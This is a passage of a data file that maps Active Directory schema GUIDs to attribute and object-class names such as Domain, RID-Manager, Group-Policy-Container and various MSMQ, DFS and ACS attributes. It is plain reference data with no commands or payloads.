"7a2be07c-302f-4b96-bc90-0795d66885f8": "documentSeries",
"7f56127a-5301-11d1-a9c5-0000f80367c1": "ACS-Direction",
"2a132585-9373-11d1-aebc-0000f80367c1": "FRS-Version",
"7b7cce4f-f1f5-4bb6-b7eb-23504af19e75": "ms-DS-Top-Quota-Usage",
"2df90d83-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Dependent-Client-Service",
"bf967a18-0de6-11d0-a285-00aa003049e2": "Replica-Source",
"f8ba8f81-4cab-4973-a3c8-3a6da62a5e31": "MS-TS-LicenseVersion3",
"19195a5a-6da0-11d0-afd3-00c04fd930c9": "Domain",
"b93e3a78-cbae-485e-a07b-5ef4ae505686": "rFC822LocalPart",
"1cb355a0-56d0-11d1-a9c6-0000f80367c1": "ACS-DSBM-DeadTime",
"26d9736c-6070-11d1-a9c6-0000f80367c1": "FRS-Version-GUID",
"d064fb68-1480-11d3-91c1-0000f87a57d4": "MS-DS-Machine-Account-Quota",
"2df90d76-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Dependent-Client-Services",
"bf967a1c-0de6-11d0-a285-00aa003049e2": "Reports",
"70ca5d97-2304-490a-8a27-52678c8d2095": "MS-TS-LicenseVersion4",
"19195a5b-6da0-11d0-afd3-00c04fd930c9": "Domain-DNS",
"1cb3559e-56d0-11d1-a9c6-0000f80367c1": "ACS-DSBM-Priority",
"1be8f173-a9ff-11d0-afe2-00c04fd930c9": "FRS-Working-Path",
"638ec2e8-22e7-409c-85d2-11b21bee72de": "ms-DS-Object-Reference",
"9a0dc33c-c100-11d1-bbc5-0080c76670c0": "MSMQ-Digests",
"45ba9d1a-56fa-11d2-90d0-00c04fd91ab1": "Repl-Interval",
"f3bcc547-85b0-432c-9ac0-304506bf2c83": "MS-TS-ManagingLS",
"6617188d-8f3c-11d0-afda-00c04fd930c9": "RID-Manager",
"1cb3559f-56d0-11d1-a9c6-0000f80367c1": "ACS-DSBM-Refresh",
"66171887-8f3c-11d0-afda-00c04fd930c9": "FSMO-Role-Owner",
"2b702515-c1f7-4b3b-b148-c0e4c6ceecb4": "ms-DS-Object-Reference-BL",
"0f71d8e0-da3b-11d1-90a5-00c04fd91ab1": "MSMQ-Digests-Mig",
"bf967a1d-0de6-11d0-a285-00aa003049e2": "Reps-From",
"349f0757-51bd-4fc8-9d66-3eceea8a25be": "MS-TS-ManagingLS2",
"bf967a99-0de6-11d0-a285-00aa003049e2": "Domain-Policy",
"7f561287-5301-11d1-a9c5-0000f80367c1": "ACS-Enable-ACS-Service",
"5fd424a1-1262-11d0-a060-00aa006c33ed": "Garbage-Coll-Period",
"93f701be-fa4c-43b6-bc2f-4dbea718ffab": "ms-DS-Operations-For-Az-Role",
"2df90d82-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Ds-Service",
"bf967a1e-0de6-11d0-a285-00aa003049e2": "Reps-To",
"fad5dcc1-2130-4c87-a118-75322cd67050": "MS-TS-ManagingLS3",
"7bfdcb89-4807-11d1-a9c3-0000f80367c1": "RID-Set",
"f072230e-aef5-11d1-bdcf-0000f80367c1": "ACS-Enable-RSVP-Accounting",
"bf96797a-0de6-11d0-a285-00aa003049e2": "Generated-Connection",
"f85b6228-3734-4525-b6b7-3f3bb220902c": "ms-DS-Operations-For-Az-Role-BL",
"2df90d78-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Ds-Services",
"7d6c0e93-7e20-11d0-afd6-00c04fd930c9": "Required-Categories",
"f7a3b6a0-2107-4140-b306-75cb521731e5": "MS-TS-ManagingLS4",
"8bfd2d3d-efda-4549-852c-f85e137aedc6": "domainRelatedObject",
"7f561285-5301-11d1-a9c5-0000f80367c1": "ACS-Enable-RSVP-Message-Logging",
"16775804-47f3-11d1-a9c3-0000f80367c1": "Generation-Qualifier",
"1aacb436-2e9d-44a9-9298-ce4debeb6ebf": "ms-DS-Operations-For-Az-Task",
"9a0dc331-c100-11d1-bbc5-0080c76670c0": "MSMQ-Encrypt-Key",
"7bfdcb7f-4807-11d1-a9c3-0000f80367c1": "Retired-Repl-DSA-Signatures",
"87e53590-971d-4a52-955b-4794d15a84ae": "MS-TSLS-Property01",
"7860e5d2-c8b0-4cbb-bd45-d9455beb9206": "room",
"eded5844-b3c3-41c3-a9e6-8984b52b7f98": "ms-Org-Group-Subtype-Name",
"7f561286-5301-11d1-a9c5-0000f80367c1": "ACS-Event-Log-Level",
"f0f8ff8e-1191-11d0-a060-00aa006c33ed": "Given-Name",
"a637d211-5739-4ed1-89b2-88974548bc59": "ms-DS-Operations-For-Az-Task-BL",
"9a0dc32f-c100-11d1-bbc5-0080c76670c0": "MSMQ-Foreign",
"b7c69e6d-2cc7-11d2-854e-00a0c983f608": "Token-Groups",
"47c77bb0-316e-4e2f-97f1-0d4c48fca9dd": "MS-TSLS-Property02",
"09b10f14-6f93-11d2-9905-0000f87a57d4": "DS-UI-Settings",
"49b7560b-4707-4aa0-a27c-e17a09ca3f97": "ms-Org-Is-Organizational-Group",
"dab029b6-ddf7-11d1-90a5-00c04fd91ab1": "ACS-Identity-Name",
"f754c748-06f4-11d2-aa53-00c04fd7d83a": "Global-Address-List",
"79d2f34c-9d7d-42bb-838f-866b3e4400e2": "ms-DS-Other-Settings",
"9a0dc32c-c100-11d1-bbc5-0080c76670c0": "MSMQ-In-Routing-Servers",
"46a9b11d-60ae-405a-b7e8-ff8a58d456d2": "Token-Groups-Global-And-Universal",
"6a84ede5-741e-43fd-9dd6-aa0f61578621": "ms-DFSR-DisablePacketPrivacy",
"80212842-4bdc-11d1-a9c4-0000f80367c1": "Rpc-Container",
"8f905f24-a413-435a-8ed1-35385ec179f7": "ms-Org-Other-Display-Names",
"f072230c-aef5-11d1-bdcf-0000f80367c1": "ACS-Max-Aggregate-Peak-Rate-Per-User",
"bf96797d-0de6-11d0-a285-00aa003049e2": "Governs-ID",
"564e9325-d057-c143-9e3b-4f9e5ef46f93": "ms-DS-Principal-Name",
"8ea825aa-3b7b-11d2-90cc-00c04fd91ab1": "MSMQ-Interval1",
"040fc392-33df-11d2-98b2-0000f87a57d4": "Token-Groups-No-GC-Acceptable",
"87811bd5-cd8b-45cb-9f5d-980f3a9e0c97": "ms-DFSR-DefaultCompressionExclusionFilter",
"3fdfee52-47f4-11d1-a9c3-0000f80367c1": "DSA",
"ee5b6790-3358-41a8-93f2-134ce21f3813": "ms-Org-Leaders",
"7f56127e-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Duration-Per-Flow",
"f30e3bbe-9ff0-11d1-b603-0000f80367c1": "GP-Link",
"fbb9a00d-3a8c-4233-9cf9-7189264903a1": "ms-DS-Quota-Amount",
"99b88f52-3b7b-11d2-90cc-00c04fd91ab1": "MSMQ-Interval2",
"bf967a21-0de6-11d0-a285-00aa003049e2": "Revision",
"a68359dc-a581-4ee6-9015-5382c60f0fb4": "ms-DFSR-OnDemandExclusionFileFilter",
"bf967aac-0de6-11d0-a285-00aa003049e2": "rpc-Entry",
"afa58eed-a698-417e-9f56-fad54252c5f4": "ms-Org-Leaders-BL",
"f0722310-aef5-11d1-bdcf-0000f80367c1": "ACS-Max-No-Of-Account-Files",
"f30e3bbf-9ff0-11d1-b603-0000f80367c1": "GP-Options",
"6655b152-101c-48b4-b347-e1fcebc60157": "ms-DS-Quota-Effective",
"9a0dc321-c100-11d1-bbc5-0080c76670c0": "MSMQ-Journal",
"bf967a22-0de6-11d0-a285-00aa003049e2": "Rid",
"7d523aff-9012-49b2-9925-f922a0018656": "ms-DFSR-OnDemandExclusionDirectoryFilter",
"66d51249-3355-4c1f-b24e-81f252aca23b": "Dynamic-Object",
"1cb3559c-56d0-11d1-a9c6-0000f80367c1": "ACS-Max-No-Of-Log-Files",
"f30e3bc1-9ff0-11d1-b603-0000f80367c1": "GPC-File-Sys-Path",
"16378906-4ea5-49be-a8d1-bfd41dff4f65": "ms-DS-Quota-Trustee",
"9a0dc324-c100-11d1-bbc5-0080c76670c0": "MSMQ-Journal-Quota",
"66171889-8f3c-11d0-afda-00c04fd930c9": "RID-Allocation-Pool",
"11e24318-4ca6-4f49-9afe-e5eb1afa3473": "ms-DFSR-Options2",
"88611bdf-8cf4-11d0-afda-00c04fd930c9": "rpc-Group",
"7f561284-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Peak-Bandwidth",
"f30e3bc0-9ff0-11d1-b603-0000f80367c1": "GPC-Functionality-Version",
"b5a84308-615d-4bb7-b05f-2f1746aa439f": "ms-DS-Quota-Used",
"9a0dc325-c100-11d1-bbc5-0080c76670c0": "MSMQ-Label",
"66171888-8f3c-11d0-afda-00c04fd930c9": "RID-Available-Pool",
"936eac41-d257-4bb9-bd55-f310a3cf09ad": "ms-DFSR-CommonStagingPath",
"dd712229-10e4-11d0-a05f-00aa006c33ed": "File-Link-Tracking",
"7f56127c-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Peak-Bandwidth-Per-Flow",
"32ff8ecc-783f-11d2-9916-0000f87a57d4": "GPC-Machine-Extension-Names",
"8a167ce4-f9e8-47eb-8d78-f7fe80abb2cc": "ms-DS-NC-Repl-Cursors",
"4580ad25-d407-48d2-ad24-43e6e56793d7": "MSMQ-Label-Ex",
"66171886-8f3c-11d0-afda-00c04fd930c9": "RID-Manager-Reference",
"135eb00e-4846-458b-8ea2-a37559afd405": "ms-DFSR-CommonStagingSizeInMb",
"88611be1-8cf4-11d0-afda-00c04fd930c9": "rpc-Profile",
"f0722311-aef5-11d1-bdcf-0000f80367c1": "ACS-Max-Size-Of-RSVP-Account-File",
"42a75fc6-783f-11d2-9916-0000f87a57d4": "GPC-User-Extension-Names",
"9edba85a-3e9e-431b-9b1a-a5b6e9eda796": "ms-DS-NC-Repl-Inbound-Neighbors",
"9a0dc335-c100-11d1-bbc5-0080c76670c0": "MSMQ-Long-Lived",
"6617188c-8f3c-11d0-afda-00c04fd930c9": "RID-Next-RID",
"d64b9c23-e1fa-467b-b317-6964d744d633": "ms-DFSR-StagingCleanupTriggerInPercent",
"8e4eb2ed-4712-11d0-a1a0-00c04fd930c9": "File-Link-Tracking-Entry",
"1cb3559d-56d0-11d1-a9c6-0000f80367c1": "ACS-Max-Size-Of-RSVP-Log-File",
"7bd4c7a6-1add-4436-8c04-3999a880154c": "GPC-WQL-Filter",
"855f2ef5-a1c5-4cc4-ba6d-32522848b61f": "ms-DS-NC-Repl-Outbound-Neighbors",
"9a0dc33f-c100-11d1-bbc5-0080c76670c0": "MSMQ-Migrated",
"6617188a-8f3c-11d0-afda-00c04fd930c9": "RID-Previous-Allocation-Pool",
"b786cec9-61fd-4523-b2c1-5ceb3860bb32": "ms-DFS-Comment-v2",
"f29653cf-7ad0-11d0-afd6-00c04fd930c9": "rpc-Profile-Element",
"81f6e0df-3b90-11d2-90cc-00c04fd91ab1": "ACS-Max-Token-Bucket-Per-Flow",
"bf96797e-0de6-11d0-a285-00aa003049e2": "Group-Attributes",
"97de9615-b537-46bc-ac0f-10720f3909f3": "ms-DS-NC-Replica-Locations",
"1d2f4412-f10d-4337-9b48-6e5b125cd265": "MSMQ-Multicast-Address",
"7bfdcb7b-4807-11d1-a9c3-0000f80367c1": "RID-Set-References",
"35b8b3d9-c58f-43d6-930e-5040f2f1a781": "ms-DFS-Generation-GUID-v2",
"89e31c12-8530-11d0-afda-00c04fd930c9": "Foreign-Security-Principal",
"7f56127b-5301-11d1-a9c5-0000f80367c1": "ACS-Max-Token-Rate-Per-Flow",
"bf967980-0de6-11d0-a285-00aa003049e2": "Group-Membership-SAM",
"3df793df-9858-4417-a701-735a1ecebf74": "ms-DS-NC-RO-Replica-Locations",
"9a0dc333-c100-11d1-bbc5-0080c76670c0": "MSMQ-Name-Style",
"6617188b-8f3c-11d0-afda-00c04fd930c9": "RID-Used-Pool",
"3c095e8a-314e-465b-83f5-ab8277bcf29b": "ms-DFS-Last-Modified-v2",
"88611be0-8cf4-11d0-afda-00c04fd930c9": "rpc-Server",
"87a2d8f9-3b90-11d2-90cc-00c04fd91ab1": "ACS-Maximum-SDU-Size",
"eea65905-8ac6-11d0-afda-00c04fd930c9": "Group-Priority",
"f547511c-5b2a-44cc-8358-992a88258164": "ms-DS-NC-RO-Replica-Locations-BL",
"eb38a158-d57f-11d1-90a2-00c04fd91ab1": "MSMQ-Nt4-Flags",
"8297931c-86d3-11d0-afda-00c04fd930c9": "Rights-Guid",
"edb027f3-5726-4dee-8d4e-dbf07e1ad1f1": "ms-DFS-Link-Identity-GUID-v2",
"c498f152-dc6b-474a-9f52-7cdba3d7d351": "friendlyCountry",
"9c65329b-3b90-11d2-90cc-00c04fd91ab1": "ACS-Minimum-Delay-Variation",
"9a9a021e-4a5b-11d1-a9c3-0000f80367c1": "Group-Type",
"2de144fc-1f52-486f-bdf4-16fcc3084e54": "ms-DS-Non-Security-Group-Extra-Classes",
"6f914be6-d57e-11d1-90a2-00c04fd91ab1": "MSMQ-Nt4-Stub",
"a8df7465-c5ea-11d1-bbcb-0080c76670c0": "Role-Occupant",
"86b021f6-10ab-40a2-a252-1dc0cc3be6a9": "ms-DFS-Link-Path-v2",
"f29653d0-7ad0-11d0-afd6-00c04fd930c9": "rpc-Server-Element",
"9517fefb-3b90-11d2-90cc-00c04fd91ab1": "ACS-Minimum-Latency",
"eea65904-8ac6-11d0-afda-00c04fd930c9": "Groups-to-Ignore",
"d161adf0-ca24-4993-a3aa-8b2c981302e8": "MS-DS-Per-User-Trust-Quota",
"9a0dc330-c100-11d1-bbc5-0080c76670c0": "MSMQ-OS-Type",
"81d7f8c2-e327-4a0d-91c6-b42d4009115f": "roomNumber",
"57cf87f7-3426-4841-b322-02b3b6e9eba8": "ms-DFS-Link-Security-Descriptor-v2",
"8447f9f3-1027-11d0-a05f-00aa006c33ed": "FT-Dfs",
"8d0e7195-3b90-11d2-90cc-00c04fd91ab1": "ACS-Minimum-Policed-Size",
"bf967982-0de6-11d0-a285-00aa003049e2": "Has-Master-NCs",
"8b70a6c6-50f9-4fa3-a71e-1ce03040449b": "MS-DS-Per-User-Trust-Tombstones-Quota",
"9a0dc32b-c100-11d1-bbc5-0080c76670c0": "MSMQ-Out-Routing-Servers",
"7bfdcb80-4807-11d1-a9c3-0000f80367c1": "Root-Trust",
"200432ce-ec5f-4931-a525-d7f4afe34e68": "ms-DFS-Namespace-Identity-GUID-v2",
"2a39c5be-8960-11d1-aebc-0000f80367c1": "RRAS-Administration-Connection-Point",
"aec2cfe3-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Max-SDU-Size",
"bf967981-0de6-11d0-a285-00aa003049e2": "Has-Partial-Replica-NCs",
"d921b50a-0ab2-42cd-87f6-09cf83a91854": "ms-DS-Preferred-GC-Site",
"9a0dc328-c100-11d1-bbc5-0080c76670c0": "MSMQ-Owner-ID",
"88611bde-8cf4-11d0-afda-00c04fd930c9": "rpc-Ns-Annotation",
"0c3e5bc5-eb0e-40f5-9b53-334e958dffdb": "ms-DFS-Properties-v2",
"bf967a9c-0de6-11d0-a285-00aa003049e2": "Group",
"b6873917-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Min-Policed-Size",
"5fd424a7-1262-11d0-a060-00aa006c33ed": "Help-Data16",
"d7c53242-724e-4c39-9d4c-2df8c9d66c7a": "ms-DS-Repl-Attribute-Meta-Data",
"2df90d75-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Prev-Site-Gates",
"bf967a23-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Bindings",
"ec6d7855-704a-4f61-9aa6-c49a7c1d54c7": "ms-DFS-Schema-Major-Version",
"f39b98ae-938d-11d1-aebd-0000f80367c1": "RRAS-Administration-Dictionary",
"a331a73f-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Peak-Rate",
"5fd424a8-1262-11d0-a060-00aa006c33ed": "Help-Data32",
"2f5c8145-e1bd-410b-8957-8bfa81d5acfd": "ms-DS-Repl-Value-Meta-Data",
"9a0dc327-c100-11d1-bbc5-0080c76670c0": "MSMQ-Privacy-Level",
"7a0ba0e0-8e98-11d0-afda-00c04fd930c9": "rpc-Ns-Codeset",
"fef9a725-e8f1-43ab-bd86-6a0115ce9e38": "ms-DFS-Schema-Minor-Version",
"bf967a9d-0de6-11d0-a285-00aa003049e2": "Group-Of-Names",
"a916d7c9-3b90-11d2-90cc-00c04fd91ab1": "ACS-Non-Reserved-Token-Size",
"5fd424a9-1262-11d0-a060-00aa006c33ed": "Help-File-Name",
"0ea12b84-08b3-11d3-91bc-0000f87a57d4": "MS-DS-Replicates-NC-Reason",
"9a0dc33e-c100-11d1-bbc5-0080c76670c0": "MSMQ-QM-ID",
"80212841-4bdc-11d1-a9c4-0000f80367c1": "rpc-Ns-Entry-Flags",
"2d7826f0-4cf7-42e9-a039-1110e0d9ca99": "ms-DFS-Short-Name-Link-Path-v2",
"bf967a91-0de6-11d0-a285-00aa003049e2": "Sam-Domain-Base",
"1cb355a2-56d0-11d1-a9c6-0000f80367c1": "ACS-Non-Reserved-Tx-Limit",
"ec05b750-a977-4efe-8e8d-ba6c1a6e33a8": "Hide-From-AB",
"85abd4f4-0a89-4e49-bdec-6f35bb2562ba": "ms-DS-Replication-Notify-First-DSA-Delay",
"8e441266-d57f-11d1-90a2-00c04fd91ab1": "MSMQ-Queue-Journal-Quota",
"bf967a24-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Group",
"6ab126c6-fa41-4b36-809e-7ca91610d48f": "ms-DFS-Target-List-v2",
"0310a911-93a3-4e21-a7a3-55d85ab2c48b": "groupOfUniqueNames",
"fe7afe45-3d14-43a7-afa7-3a1b144642af": "ms-Mcs-AdmPwdExpirationTime",
"f072230d-aef5-11d1-bdcf-0000f80367c1": "ACS-Non-Reserved-Tx-Size",
"bf967985-0de6-11d0-a285-00aa003049e2": "Home-Directory",
"d63db385-dd92-4b52-b1d8-0d3ecc0e86b6": "ms-DS-Replication-Notify-Subsequent-DSA-Delay",
"2df90d87-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Queue-Name-Ext",
"bf967a25-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Interface-ID",
"ea944d31-864a-4349-ada5-062e2c614f5e": "ms-DFS-Ttl-v2",
"bf967aad-0de6-11d0-a285-00aa003049e2": "Sam-Server",
"4c9928d7-d725-4fa6-a109-aba3ad8790e5": "ms-Mcs-AdmPwd",
"7f561282-5301-11d1-a9c5-0000f80367c1": "ACS-Permission-Bits",
"bf967986-0de6-11d0-a285-00aa003049e2": "Home-Drive",
"08e3aa79-eb1c-45b5-af7b-8f94246c8e41": "ms-DS-ReplicationEpoch",
"3f6b8e12-d57f-11d1-90a2-00c04fd91ab1": "MSMQ-Queue-Quota",
"29401c48-7a27-11d0-afd6-00c04fd930c9": "rpc-Ns-Object-ID",
"3ced1465-7b71-2541-8780-1e1ea6243a82": "ms-DS-BridgeHead-Servers-Used",
"f30e3bc2-9ff0-11d1-b603-0000f80367c1": "Group-Policy-Container",
"1cb3559a-56d0-11d1-a9c6-0000f80367c1": "ACS-Policy-Name",
"a45398b7-c44a-4eb6-82d3-13c10946dbfe": "houseIdentifier",
"d5b35506-19d6-4d26-9afb-11357ac99b5e": "ms-DS-Retired-Repl-NC-Signatures",
"9a0dc320-c100-11d1-bbc5-0080c76670c0": "MSMQ-Queue-Type",
"bf967a27-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Priority",
"51c9f89d-4730-468d-a2b5-1d493212d17e": "ms-DS-Is-Used-As-Resource-Security-Attribute",
"bf967aae-0de6-11d0-a285-00aa003049e2": "Secret",
"7f561281-5301-11d1-a9c5-0000f80367c1": "ACS-Priority",
"6043df71-fa48-46cf-ab7c-cbd54644b22d": "host",
"b39a61be-ed07-4cab-9a4a-4963ed0141e1": "ms-ds-Schema-Extensions",
"9a0dc322-c100-11d1-bbc5-0080c76670c0": "MSMQ-Quota",
"bf967a28-0de6-11d0-a285-00aa003049e2": "rpc-Ns-Profile-Entry",
"2e28edee-ed7c-453f-afe4-93bd86f2174f": "ms-DS-Claim-Possible-Values",
"7bfdcb8a-4807-11d1-a9c3-0000f80367c1": "Index-Server-Catalog",
"f072230f-aef5-11d1-bdcf-0000f80367c1": "ACS-RSVP-Account-Files-Location",
"f0f8ff83-1191-11d0-a060-00aa006c33ed": "Icon-Path",
"4c51e316-f628-43a5-b06b-ffb695fcb4f3": "ms-DS-SD-Reference-Domain",
"3bfe6748-b544-485a-b067-1b310c4334bf": "MSMQ-Recipient-FormatName",
"29401c4a-7a27-11d0-afd6-00c04fd930c9": "rpc-Ns-Transfer-Syntax",
"c66217b9-e48e-47f7-b7d5-6552b8afd619": "ms-DS-Claim-Value-Type",
"4828cc14-1437-45bc-9b07-ad6f015e5f28": "inetOrgPerson",
"bf967aaf-0de6-11d0-a285-00aa003049e2": "Security-Object",
"1cb3559b-56d0-11d1-a9c6-0000f80367c1": "ACS-RSVP-Log-Files-Location",
"7d6c0e92-7e20-11d0-afd6-00c04fd930c9": "Implemented-Categories",
"4f146ae8-a4fe-4801-a731-f51848a4f4e4": "ms-DS-Security-Group-Extra-Classes",
"2df90d81-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Routing-Service",
"3e0abfd0-126a-11d0-a060-00aa006c33ed": "SAM-Account-Name",
"eebc123e-bae6-4166-9e5b-29884a8b76b0": "ms-DS-Claim-Attribute-Source",
"7f56127f-5301-11d1-a9c5-0000f80367c1": "ACS-Service-Type",
"7bfdcb87-4807-11d1-a9c3-0000f80367c1": "IndexedScopes",
"0e1b47d7-40a3-4b48-8d1b-4cac0c1cdf21": "ms-DS-Settings",
"2df90d77-009f-11d2-aa4c-00c04fd7d83a": "MSMQ-Routing-Services",
"6e7b626c-64f2-11d0-afd2-00c04fd930c9": "SAM-Account-Type",
"6afb0e4c-d876-437c-aeb6-c3e41454c272": "ms-DS-Claim-Type-Applies-To-Class",
"2df90d89-009f-11d2-aa4c-00c04fd7d83a": "Infrastructure-Update",
"bf967a92-0de6-11d0-a285-00aa003049e2": "Server",
"7f561279-5301-11d1-a9c5-0000f80367c1": "ACS-Time-Of-Day",
"52458023-ca6a-11d0-afff-0000f80367c1": "Initial-Auth-Incoming",
"c17c5602-bcb7-46f0-9656-6370ca884b72": "ms-DS-Site-Affinity",
"8bf0221b-7a06-4d63-91f0-1499941813d3": "MSMQ-Secured-Source",
"04d2d114-f799-4e9b-bcdc-90e8f5ba7ebe": "SAM-Domain-Updates",
"52c8d13a-ce0b-4f57-892b-18f5a43a2400": "ms-DS-Claim-Shares-Possible-Values-With",
"7f561280-5301-11d1-a9c5-0000f80367c1": "ACS-Total-No-Of-Flows",
"52458024-ca6a-11d0-afff-0000f80367c1": "Initial-Auth-Outgoing",
"789ee1eb-8c8e-4e4c-8cec-79b31b7617b5": "ms-DS-SPN-Suffixes",
"9a0dc32d-c100-11d1-bbc5-0080c76670c0": "MSMQ-Service-Type",
"dd712224-10e4-11d0-a05f-00aa006c33ed": "Schedule",
"54d522db-ec95-48f5-9bbd-1880ebbb2180": "ms-DS-Claim-Shares-Possible-Values-With-BL",
"07383086-91df-11d1-aebc-0000f80367c1": "Intellimirror-Group",
"f780acc0-56f0-11d1-a9c6-0000f80367c1": "Servers-Container",
"7cbd59a5-3b90-11d2-90cc-00c04fd91ab1": "ACS-Server-List",
"f0f8ff90-1191-11d0-a060-00aa006c33ed": "Initials",
"35319082-8c4a-4646-9386-c2949d49894d": "ms-DS-Tasks-For-Az-Role",
"9a0dc33d-c100-11d1-bbc5-0080c76670c0": "MSMQ-Services",
"bf967a2b-0de6-11d0-a285-00aa003049e2": "Schema-Flags-Ex",
"4d371c11-4cad-4c41-8ad2-b180ab2bd13c": "ms-DS-Members-Of-Resource-Property-List",
"6d05fb41-246b-11d0-a9c8-00aa006c33ed": "Additional-Information",
"96a7dd64-9118-11d1-aebc-0000f80367c1": "Install-Ui-Level",
"a0dcd536-5158-42fe-8c40-c00a7ad37959": "ms-DS-Tasks-For-Az-Role-BL",
"9a0dc33b-c100-11d1-bbc5-0080c76670c0": "MSMQ-Sign-Certificates",
"bf967923-0de6-11d0-a285-00aa003049e2": "Schema-ID-GUID",
"7469b704-edb0-4568-a5a5-59f4862c75a7": "ms-DS-Members-Of-Resource-Property-List-BL",
"07383085-91df-11d1-aebc-0000f80367c1": "Intellimirror-SCP",
"b7b13123-b82e-11d0-afee-0000f80367c1": "Service-Administration-Point",
"032160be-9824-11d1-aec0-0000f80367c1": "Additional-Trusted-Service-Names",
"bf96798c-0de6-11d0-a285-00aa003049e2": "Instance-Type",
"b11c8ee2-5fcd-46a7-95f0-f38333f096cf": "ms-DS-Tasks-For-Az-Task",
"3881b8ea-da3b-11d1-90a5-00c04fd91ab1": "MSMQ-Sign-Certificates-Mig",
"f9fb64ae-93b4-11d2-9945-0000f87a57d4": "Schema-Info",
"b47f510d-6b50-47e1-b556-772c79e4ffc4": "ms-SPP-CSVLK-Pid",
"f0f8ff84-1191-11d0-a060-00aa006c33ed": "Address",
"b7c69e60-2cc7-11d2-854e-00a0c983f608": "Inter-Site-Topology-Failover",
"df446e52-b5fa-4ca2-a42f-13f98a526c8f": "ms-DS-Tasks-For-Az-Task-BL",
"9a0dc332-c100-11d1-bbc5-0080c76670c0": "MSMQ-Sign-Key",
"1e2d06b4-ac8f-11d0-afe3-00c04fd930c9": "Schema-Update",
"a601b091-8652-453a-b386-87ad239b7c08": "ms-SPP-CSVLK-Partial-Product-Key",
"26d97376-6070-11d1-a9c6-0000f80367c1": "Inter-Site-Transport",
"bf967ab1-0de6-11d0-a285-00aa003049e2": "Service-Class",
"f70b6e48-06f4-11d2-aa53-00c04fd7d83a": "Address-Book-Roots",
"b7c69e5e-2cc7-11d2-854e-00a0c983f608": "Inter-Site-Topology-Generator",
"2cc4b836-b63f-4940-8d23-ea7acf06af56": "ms-DS-User-Account-Control-Computed",
"9a0dc337-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-1",
"bf967a2c-0de6-11d0-a285-00aa003049e2": "Schema-Version",
"9684f739-7b78-476d-8d74-31ad7692eef4": "ms-SPP-CSVLK-Sku-Id",
"5fd42461-1262-11d0-a060-00aa006c33ed": "Address-Entry-Display-Table",
"b7c69e5f-2cc7-11d2-854e-00a0c983f608": "Inter-Site-Topology-Renew",
"add5cf10-7b09-4449-9ae6-2534148f8a72": "ms-DS-User-Password-Expiry-Time-Computed",
"9a0dc338-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-2",
"16f3a4c2-7e79-11d2-9921-0000f87a57d4": "Scope-Flags",
"9b663eda-3542-46d6-9df0-314025af2bac": "ms-SPP-KMS-Ids",
"26d97375-6070-11d1-a9c6-0000f80367c1": "Inter-Site-Transport-Container",
"28630ec1-41d5-11d1-a9c1-0000f80367c1": "Service-Connection-Point",
"5fd42462-1262-11d0-a060-00aa006c33ed": "Address-Entry-Display-Table-MSDOS",
"bf96798d-0de6-11d0-a285-00aa003049e2": "International-ISDN-Number",
"146eb639-bb9f-4fc1-a825-e29e00c77920": "ms-DS-UpdateScript",
"fd129d8a-d57e-11d1-90a2-00c04fd91ab1": "MSMQ-Site-Foreign",
"bf9679a8-0de6-11d0-a285-00aa003049e2": "Script-Path",
"69bfb114-407b-4739-a213-c663802b3e37": "ms-SPP-Installation-Id",
"16775781-47f3-11d1-a9c3-0000f80367c1": "Address-Home",
"bf96798e-0de6-11d0-a285-00aa003049e2": "Invocation-Id",
"773e93af-d3b4-48d4-b3f9-06457602d3d0": "ms-DS-Source-Object-DN",
"9a0dc339-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-Gates",
"c3dbafa6-33df-11d2-98b2-0000f87a57d4": "SD-Rights-Effective",
"6e8797c4-acda-4a49-8740-b0bd05a9b831": "ms-SPP-Confirmation-Id",
"b40ff825-427a-11d1-a9c2-0000f80367c1": "Ipsec-Base",
"bf967ab2-0de6-11d0-a285-00aa003049e2": "Service-Instance",
"5fd42463-1262-11d0-a060-00aa006c33ed": "Address-Syntax",
"b40ff81f-427a-11d1-a9c2-0000f80367c1": "Ipsec-Data",
"778ff5c9-6f4e-4b74-856a-d68383313910": "ms-DS-KrbTgt-Link",
"e2704852-3b7b-11d2-90cc-00c04fd91ab1": "MSMQ-Site-Gates-Mig",
"bf967a2d-0de6-11d0-a285-00aa003049e2": "Search-Flags",
"098f368e-4812-48cd-afb7-a136b96807ed": "ms-SPP-Online-License",
"5fd42464-1262-11d0-a060-00aa006c33ed": "Address-Type",
"b40ff81e-427a-11d1-a9c2-0000f80367c1": "Ipsec-Data-Type",
"185c7821-3749-443a-bd6a-288899071adb": "ms-DS-Revealed-Users",
"9a0dc340-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-ID",
"bf967a2e-0de6-11d0-a285-00aa003049e2": "Search-Guide",
"67e4d912-f362-4052-8c79-42f45ba7b221": "ms-SPP-Phone-License",
"b40ff826-427a-11d1-a9c2-0000f80367c1": "Ipsec-Filter",
"5fe69b0b-e146-4f15-b0ab-c1e5d488e094": "simpleSecurityObject",
"553fd038-f32e-11d0-b0bc-00c04fd8dca6": "Admin-Context-Menu",
"b40ff823-427a-11d1-a9c2-0000f80367c1": "Ipsec-Filter-Reference",
"1d3c2d18-42d0-4868-99fe-0eca1e6fa9f3": "ms-DS-Has-Full-Replica-NCs",
"ffadb4b2-de39-11d1-90a5-00c04fd91ab1": "MSMQ-Site-Name",
"01072d9a-98ad-4a53-9744-e83e287278fb": "secretary",
"0353c4b5-d199-40b0-b3c5-deb32fd9ec06": "ms-SPP-Config-License",
"bf967918-0de6-11d0-a285-00aa003049e2": "Admin-Count",
"b40ff81d-427a-11d1-a9c2-0000f80367c1": "Ipsec-ID",
